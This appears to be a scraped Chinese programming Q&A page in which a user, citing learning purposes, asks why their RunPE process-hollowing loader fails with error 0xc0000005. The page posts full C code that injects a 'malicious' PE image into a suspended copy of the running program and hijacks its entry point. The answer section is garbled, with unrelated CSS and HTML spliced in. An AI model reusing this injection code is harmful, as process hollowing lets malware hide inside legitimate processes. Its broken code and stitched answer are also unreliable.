如何解决为什么我得到0xc00000005?
我正在尝试使用RunPE技术(用于学习)。
首先,我在Windows XP(32位)上尝试了此操作,但未发生任何错误,但(HelloWorld)的注入代码未运行。
然后,我尝试在Windows 7和10(64位)上使用它,并在线程恢复时收到此错误[0xc00000005]。为什么会出现此错误,为什么注入的代码无法在XP计算机上运行?
我也尝试取消映射数据库(0x00400000),但是我遇到了同样的问题。
我的代码:
int runPe(void* image) {
IMAGE_DOS_HEADER* dosHeader;
IMAGE_NT_HEADERS* ntHeader;
IMAGE_SECTION_HEADER* sectionHeader;
CONTEXT* ctx;
PROCESS_informatION pinfo;
STARTUPINFO sinfo;
int i;
DWORD* ImageBase = NULL;
void* pImage = NULL;
char currentpath[1024];
GetmodulefileNameA(0,currentpath,1024); //path to the current exe
//Identifying the MALICIoUS IMAGE HEADERS
dosHeader = (PIMAGE_DOS_HEADER)(image);
ntHeader = (PIMAGE_NT_HEADERS)((DWORD)image + dosHeader->e_lfanew);
//Checks if this is a PE FILE
if (ntHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&pinfo,sizeof(pinfo));
ZeroMemory(&sinfo,sizeof(sinfo));
if (CreateProcessA(currentpath,NULL,FALSE,CREATE_SUSPENDED,&sinfo,&pinfo)) {
printf("[*] Suspended process is created\n");
Sleep(600);
//Allocate memory for the context of suspended process
ctx = (LPCONTEXT)(VirtualAlloc(NULL,sizeof(ctx),MEM_COMMIT,PAGE_READWRITE));
if (ctx) {
ctx->ContextFlags = CONTEXT_FULL;
printf("[*] Context is allocated successfully\n");
Sleep(600);
//Get the thread context
if (Getthreadcontext(pinfo.hThread,(LPCONTEXT)ctx)) {
printf("[*] Allocating MALICIoUS image headers into the suspended process\n");
Sleep(600);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(ctx->Ebx + 8),(LPVOID)(&ImageBase),4,0);
pImage = VirtualAllocEx(pinfo.hProcess,ntHeader->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (pImage) {
printf("[*] Allocating memory for MALICIoUS image headers into the IMAGE_BASE\n");
Sleep(600);
//Writing the image intor the process address space
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)pImage,image,ntHeader->OptionalHeader.SizeOfheaders,NULL)) {
printf("[*] Writing memory for MALICIoUS image headers into the IMAGE_BASE\n");
Sleep(600);
//sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
for (i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
{
sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + 248 + (i * sizeof(IMAGE_SECTION_HEADER)));
if (sectionHeader->SizeOfRawData == 00000000)
continue;
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)((DWORD)(pImage) + sectionHeader->VirtualAddress),(LPVOID)((DWORD)image + sectionHeader->PointerToRawData),sectionHeader->SizeOfRawData,0))
{
printf("[*] Allocating memory for Section %d at %X\n",i,(LPVOID)((DWORD)pImage + sectionHeader->VirtualAddress));
Sleep(600);
}
else
{
printf("ERROR: Writing section (%d) into memory Failed\n",i);
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
//Change the imageBase address from the suspened process into the MALICIoUS
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)(ctx->Ebx + 8),(LPVOID)(ntHeader->OptionalHeader.ImageBase),0)) {
printf("[*] Image base address is changed to MALICIoUS\n");
Sleep(600);
//Now we will move the address of entrypoint to the MALCIoUS image
// At EAX register
ctx->Eax = (DWORD)pImage + ntHeader->OptionalHeader.AddressOfEntryPoint;
printf("[*] AddressOfEntryPoint is changed to MALICIoUS\n");
Sleep(600);
//Set Thread Context and resume it
Setthreadcontext(pinfo.hThread,(LPCONTEXT)ctx);
ResumeThread(pinfo.hThread);
printf("[*] Thread is resumed\n");
}
else
{
printf("ERROR: Change the imageBase address from the suspened process into the MALICIoUS Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Writing the image into the process address space Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Allocating memory for MALICIoUS image headers into the IMAGE_BASE Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Getthreadcontext Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Context allocation Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
return 0;
}
else
{
printf("ERROR: Invalid nt SIGNATURE\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
解决方法
它有效,我认为将图像库地址更改为注入的代码时出错。
我认为错误在这里:
#block {
position:relative;
}
.pLined {
position:relative;
}
.pLined > span {
display:block;
}
#div {
position:absolute;
display:none;
color:white;
background-color:rgba(255,0.75);
top:auto;
left:auto;
z-index:1;
}
#div.toLine {
display:block;
}
已修改(错误是指向图像缓冲区的指针错误)
<div id="block">
<p class="pLined">
<span>Line 1 Text</span>
<span>Line 2 Text</span>
<span>Line 3 Text</span>
<span>Line 4 Text</span>
<span>Line 5 Text</span>
</p>
<button id="btn">Div</button>
<div id="div"></div>
</div>
,然后使用NtUnmapViewOfSection取消映射图片库地址:
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)(ctx->Ebx + 8),(LPVOID)(ntHeader->OptionalHeader.ImageBase),4,0))
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。